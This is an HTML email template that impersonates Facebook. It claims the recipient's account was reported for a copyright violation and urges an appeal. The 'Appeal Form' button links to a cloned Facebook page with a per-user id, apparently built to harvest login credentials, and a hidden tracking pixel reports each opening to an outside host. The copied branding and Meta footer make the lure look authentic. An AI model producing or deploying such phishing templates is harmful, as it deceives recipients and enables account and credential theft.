<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f6f6f6;
        margin: 0;
        padding: 0;
        -webkit-font-smoothing: antialiased;
      }
      .container {
        max-width: 600px;
        margin: 50px auto;
        background-color: #ffffff;
        padding: 20px;
        border-radius: 8px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      }
      .header {
        padding-bottom: 20px;
        border-bottom: 1px solid #eaeaea;
        text-align: left;
      }
      .header img {
        width: 50px;
      }
      .content {
        padding: 20px 0;
        text-align: left;
      }
      .content h1 {
        font-size: 24px;
        color: #333;
      }
      .code {
        font-size: 32px;
        font-weight: bold;
        background-color: #f0f0f0;
        padding: 10px;
        border-radius: 8px;
        margin: 20px 0;
        display: inline-block;
      }
      .button {
        margin: 20px 0;
        text-align: center;
      }
      .button a {
        background-color: #1877f2;
        color: #fff;
        padding: 15px 25px;
        border-radius: 8px;
        text-decoration: none;
        font-weight: bold;
        display: inline-block;
        align-items: center;
        width: 80%;
      }
      .footer {
        text-align: left;
        padding-top: 20px;
        border-top: 1px solid #eaeaea;
        font-size: 12px;
        color: #777;
      }
      .footer a {
        color: #1877f2;
        text-decoration: none;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <div class="header">
        <img
          src="https://upload.wikimedia.org/wikipedia/commons/0/05/Facebook_Logo_%282019%29.png"
          alt="Facebook"
        />
      </div>
      <div class="content">
        <h1>Hello [someone@example.com]</h1>
        <p style="line-height: 1.5">
          Your account has been reported for denial of copyright. According to
          our community guidelines, copyright complatints are very important. If
          you think this an eror, you can appeal to our team using the appeal
          Form.If you think we made a mistake, please fill out the appeal form
          and appeal.
        </p>

        <div class="button">
          <a
            href="http://127.0.0.1:5500/clone/Work_facebook.html?id=[userid]"
            >Appeal Form</a
          >
        </div>
        <p>Thank you</p>
        <p>
          <a style="text-decoration: none" href="https://www.facebook.com/"
            >Facebook</a
          >
          Team
        </p>
      </div>
      <div class="footer">
        <p>
          © Facebook. Meta Platforms Ireland Ltd., Attention: Community
          Operations, 4 Grand Canal Square, Dublin 2, Ireland
        </p>
        <p>
          This message was sent to [someone@example.com]. To help protect your
          account, do not forward this email. <a href="#">Find out more</a>
        </p>
      </div>
      <img src="https://test-gcp-yxksxlem4a-as.a.run.app/track_pixel?id=[userid]" alt="" />

    </div>
  </body>
</html>
